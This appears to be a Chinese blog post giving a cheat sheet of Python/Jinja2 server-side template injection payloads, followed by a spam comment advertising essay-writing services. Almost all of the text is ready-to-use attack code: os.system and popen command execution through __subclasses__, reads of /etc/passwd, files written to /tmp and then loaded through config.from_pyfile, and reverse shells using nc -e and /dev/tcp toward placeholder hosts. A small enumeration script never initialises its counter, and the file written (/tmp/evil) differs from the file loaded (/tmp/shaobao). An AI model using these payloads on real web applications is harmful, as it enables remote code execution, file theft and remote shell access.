命令执行

#python2
[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].system('ls')
"".__class__.__mro__[-1].__subclasses__()[60].__init__.__globals__['__builtins__']['eval']('__import__("os").system("ls")')
().__class__.__bases__[0].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()

文件读取或者写入

#python2
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}   

查看环境变量

config.items()

反弹shell

# 写入文件
#payload 1 ::
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from os import system%0aCMD = system') }}
#payload 2 ::
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil', 'w').write('from subprocess import check_output%0aRUNCMD=check_output') }}
# 利用 config.from_pyfile 加载文件
{{ config.from_pyfile('/tmp/shaobao') }}
# 反弹shell ; 提供两种方法;对应上的两个文件
#payload1 ::
{{ config['CMD']('nc xxxxxx 5555 -e /bin/sh') }}
#payload2 ::
{{ config['RUNCMD']('bash -i >& /dev/tcp/xxxx/5555 0>&1',shell=True) }}

寻找模块的代码

#!/usr/bin/env python
# encoding: utf-8
for item in ''.__class__.__mro__[2].__subclasses__():
    try:
         if 'os' in item.__init__.__globals__:
             print num,item
         num+=1
    except:
        print '-'
        num+=1

9 对 “python 模板注入利用(ssti)”的想法;

  1. looking for someone to write my essay
    [url=”https://customessays-writing.org”]how can i pay someone to write my essay[/url]
    help in writing an essay

发表评论

邮箱地址不会被公开。